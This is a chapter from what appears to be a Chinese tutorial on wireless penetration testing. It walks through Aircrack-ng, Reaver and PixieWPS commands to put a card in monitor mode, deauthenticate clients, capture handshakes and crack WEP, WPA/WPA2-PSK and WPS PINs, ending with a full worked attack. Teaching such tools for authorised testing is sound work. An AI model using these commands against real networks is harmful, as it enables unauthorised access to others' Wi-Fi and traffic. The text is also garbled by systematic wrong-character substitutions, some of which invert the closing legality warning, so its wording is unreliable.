共计 2276 个字符,预计需要花费 6 分钟才能阅读完成。
在本章节中,咱们将学习一些罕用的无线网络浸透测试工具,如 Aircrack-ng、Reaver 等。咱们将尽量解说得具体、通俗易懂,并提供尽可能多的实例。
6.1 Aircrack-ng 套件
Aircrack-ng 是一个用于测试无线网络安全的工具集,包含捕捉数据包、破解 WEP 和 WPA/WPA2-PSK 密钥、创立和治理拜访点等性能。以下是 Aircrack-ng 套件中的一些次要工具:
6.1.1 airmon-ng
airmon-ng 用于治理无线网卡的监督模式。监督模式容许无线网卡捕捉所有左近的无线流量,而不仅仅是与其连贯的网络。
启用监督模式:
airmon-ng start wlan0
此命令将启用名为 wlan0 的无线网卡的监督模式,并创立一个名为 wlan0mon 的新接口。
6.1.2 airodump-ng
airodump-ng 用于捕捉无线网络的数据包,包含 SSID、BSSID、信道、加密类型等信息。
扫描左近的无线网络:
airodump-ng wlan0mon
此命令将应用名为 wlan0mon 的监督接口扫描左近的无线网络,并显示 SSID、BSSID、信道、加密类型等信息。
捕捉指标网络的数据包:
airodump-ng -c [channel] --bssid [BSSID] -w [output_file] wlan0mon
此命令将捕捉指定信道和 BSSID 的指标网络的数据包,并将其保留到 output_file 中。
6.1.3 aireplay-ng
aireplay-ng 用于发送数据包以生成流量,有助于放慢破解 WEP 和 WPA/WPA2-PSK 密钥的过程。
执行 WEP 攻打:
aireplay-ng -3 -b [BSSID] wlan0mon
此命令将对指定 BSSID 的指标网络执行 ARP 申请重注入攻打,以生成足够的数据包进行 WEP 破解。
执行 WPA/WPA2-PSK 攻打:
aireplay-ng -0 1 -a [BSSID] -c [client_MAC] wlan0mon
此命令将对指定 BSSID 的指标网络发送解除认证数据包,迫使客户端从新认证并捕捉握手数据包。
6.1.4 aircrack-ng
aircrack-ng 用于破解 WEP 和 WPA/WPA2-PSK 密钥。
破解 WEP 密钥:
aircrack-ng [output_file]-01.cap
此命令将尝试破解捕捉到的 WEP 数据包,以获取 WEP 密钥。
破解 WPA/WPA2-PSK 密钥:
aircrack-ng -w [wordlist] [output_file]-01.cap
此命令将应用字典文件 wordlist 尝试破解捕捉到的 WPA/WPA2-PSK 握手数据包,以获取 WPA/WPA2-PSK 密钥。
6.2 Reaver
Reaver 是一个用于破解 WPS PIN 码的工具,进而获取 WPA/WPA2-PSK 密钥。Reaver 利用 WPS 设计的破绽,通过暴力破解 PIN 码来实现攻打。
应用 Reaver 破解 WPS PIN 码:
reaver -i wlan0mon -b [BSSID] -vv
此命令将应用名为 wlan0mon 的监督接口,针对指定 BSSID 的指标网络,尝试破解 WPS PIN 码。
6.3 PixieWPS
PixieWPS 是一个用于利用 WPS 破绽的工具,能够与 Reaver 一起应用,使 WPS 攻打更加高效。
应用 Reaver 和 PixieWPS 进行 WPS 攻打:
reaver -i wlan0mon -b [BSSID] -c [channel] -K 1 -vv
此命令将应用名为 wlan0mon 的监督接口,针对指定信道和 BSSID 的指标网络,尝试破解 WPS PIN 码,并应用 PixieWPS 进行高效攻打。
6.4 Wireshark
Wireshark 是一个功能强大的网络协议分析器,能够用于捕捉和剖析数据包,包含无线数据包。
应用 Wireshark 捕捉无线数据包:
- 关上 Wireshark。
- 抉择名为 wlan0mon 的监督接口。
- 开始捕捉数据包。
6.5 实战案例
以下是一个应用 Aircrack-ng 套件执行 WPA/WPA2-PSK 攻打的实战案例:
- 启用监督模式:
airmon-ng start wlan0
- 扫描左近的无线网络:
airodump-ng wlan0mon
找到指标网络的 BSSID 和信道,例如 BSSID 为 12:34:56:78:9A:BC
,信道为 6。
- 捕捉指标网络的数据包:
airodump-ng -c 6 --bssid 12:34:56:78:9A:BC -w output wlan0mon
- 发送解除认证数据包以捕捉握手数据包:
aireplay-ng -0 1 -a 12:34:56:78:9A:BC -c 01:23:45:67:89:AB wlan0mon
其中,01:23:45:67:89:AB
是指标网络客户端的 MAC 地址。
- 应用字典文件破解握手数据包:
aircrack-ng -w wordlist.txt output-01.cap
如果破解胜利,将显示 WPA/WPA2-PSK 密钥。
请留神,无线网络浸透测试应该在非法范畴内进行。在没有受权的状况下攻打别人的无线网络是守法的。在学习和实际过程中,请确保本人恪守当地法律法规,免得触犯法律。
总结:在本章节中,咱们具体介绍了无线网络浸透测试工具,如 Aircrack-ng、Reaver 等,并提供了实例来帮忙你更好地了解这些工具的应用办法。心愿这些内容对你有所帮忙,让你可能把握无线网络浸透测试的基本技能。
举荐浏览:
https://mp.weixin.qq.com/s/dV2JzXfgjDdCmWRmE0glDA
https://mp.weixin.qq.com/s/an83QZOWXHqll3SGPYTL5g